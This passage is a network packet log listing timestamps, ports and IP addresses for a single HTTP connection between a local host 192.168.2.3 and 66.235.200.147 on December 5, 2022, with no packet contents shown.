Dec 5, 2022 01:32:37.698097944 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.698129892 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.698162079 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.698169947 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.698194981 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.698199034 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.698232889 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.698265076 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.698297977 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.698303938 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.698331118 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.698338985 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.698657990 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.698693991 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.698746920 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.698754072 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.698786974 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.698796034 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.698820114 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.698853016 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.698904037 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.698908091 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.698936939 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.698944092 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.698970079 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.699004889 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.699038029 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.699049950 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.699069977 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.699074984 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.699103117 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.699135065 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.699167013 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.699174881 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.699199915 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.699204922 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.699232101 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.699264050 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.699295998 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.699304104 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.699328899 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.699336052 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.699549913 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.699583054 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.699615955 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.699637890 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.699647903 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.699655056 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.699680090 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.699712038 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.699743032 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.699754953 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.699774981 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.699779034 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.699806929 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.699837923 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.699877977 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.713838100 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.713901997 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.713947058 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.713989019 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.713999033 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.714030981 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.714031935 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.714071989 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.714076042 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.714114904 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.714155912 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.714198112 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.714234114 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.714240074 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.714263916 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.714282036 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.714323044 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.714365959 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.714400053 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.714407921 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.714412928 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.714452028 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.714490891 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.714502096 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.714529991 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.714570999 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.714576006 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.714610100 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.714648962 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.714653969 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.714689016 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.714730978 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.714776039 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.714780092 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.714812994 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.714818001 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.714853048 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.714911938 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.714952946 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.714958906 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.714992046 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.714993954 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.715032101 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.715070963 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.715112925 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.715114117 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.715152979 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.715153933 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.715194941 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.715234995 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.715276003 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.715282917 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.715316057 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.715317011 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.715358019 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.715396881 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.715436935 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.715437889 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.715477943 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.715486050 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.715517998 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.715558052 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.715598106 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.715604067 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.715636969 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.715637922 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.715677977 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.715718031 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.715759993 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.715763092 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.715800047 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.715801001 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.715840101 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.715881109 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.715920925 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.715924978 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.715960979 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.715961933 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.716001034 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.716041088 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.716080904 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.716084003 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.716119051 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.716123104 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.716164112 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.716203928 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.716223955 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.716244936 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.716284037 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.716324091 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.716329098 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.716363907 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.716366053 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.716403961 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.716444016 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.716484070 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.716489077 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.716523886 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.716523886 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.716564894 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.716605902 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.716646910 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.716648102 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.716686010 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.716690063 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.716726065 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.716767073 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.716805935 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.716811895 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.716847897 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.716850042 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.716888905 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.716928959 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.716969013 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.716974020 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.717009068 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.717010021 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.717050076 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.717092037 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.717132092 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.717135906 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.717171907 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.717171907 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.717211962 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.717252016 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.717291117 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.717297077 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.717329979 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.717330933 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.717370033 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.717410088 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.717449903 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.717453957 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.717489958 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.717490911 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.717530012 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.717569113 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.717609882 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.717612028 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.717648983 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.717650890 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.717689037 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.717729092 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.717767954 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.717773914 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.717808008 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.717808962 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.717863083 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.717905045 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.717947960 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.717948914 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.717987061 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.717989922 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.718034983 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.718079090 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.718123913 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.718128920 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.718164921 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.718167067 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.718209982 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.718252897 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.718296051 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.718297958 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.718338966 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.718339920 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.718384027 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.718425989 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.718427896 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.718476057 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.718519926 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.718524933 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.718569040 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.718611002 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.718626022 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.718653917 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.718698978 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.718730927 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.718741894 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.718782902 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.718784094 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.718827009 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.718869925 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.718914032 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.718934059 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.718976974 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.718977928 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.719023943 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.719068050 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.719101906 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.719113111 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.719156027 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.719156027 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.719198942 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.719244003 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.719276905 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.719285965 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.719329119 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.719330072 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.719391108 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.719434977 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.719434977 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.719477892 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.719521046 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.719536066 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.719563961 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.719607115 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.719613075 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.719655037 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.719700098 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.719743013 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.719748974 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.719785929 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.719788074 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.719835997 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.719937086 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.737448931 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.737497091 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.737535954 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.737572908 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.737608910 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.737616062 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.737644911 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.737653017 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.737680912 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.737689972 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.737716913 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.737749100 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.737787008 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.737803936 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.737823963 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.737833023 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.737860918 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.737900972 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.737952948 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.737961054 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.738009930 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.738013029 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.738059998 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.738107920 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.738153934 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.738153934 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.738198042 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.738199949 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.738245964 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.738291979 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.738337994 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.738338947 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.738382101 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.738385916 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.738432884 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.738482952 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.738495111 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.738529921 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.738574982 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.738620043 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.738620996 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.738665104 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.738668919 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.738718987 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.738765955 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.738812923 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.738816023 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.738856077 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.738864899 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.738929987 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.738974094 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.739032030 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.739033937 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.739088058 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.739092112 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.739142895 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.739190102 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.739234924 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.739236116 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.739279032 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.739280939 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.739329100 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.739375114 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.739418030 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.739422083 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.739470005 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.739470005 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.739516973 CET	80	49705	66.235.200.147	192.168.2.3
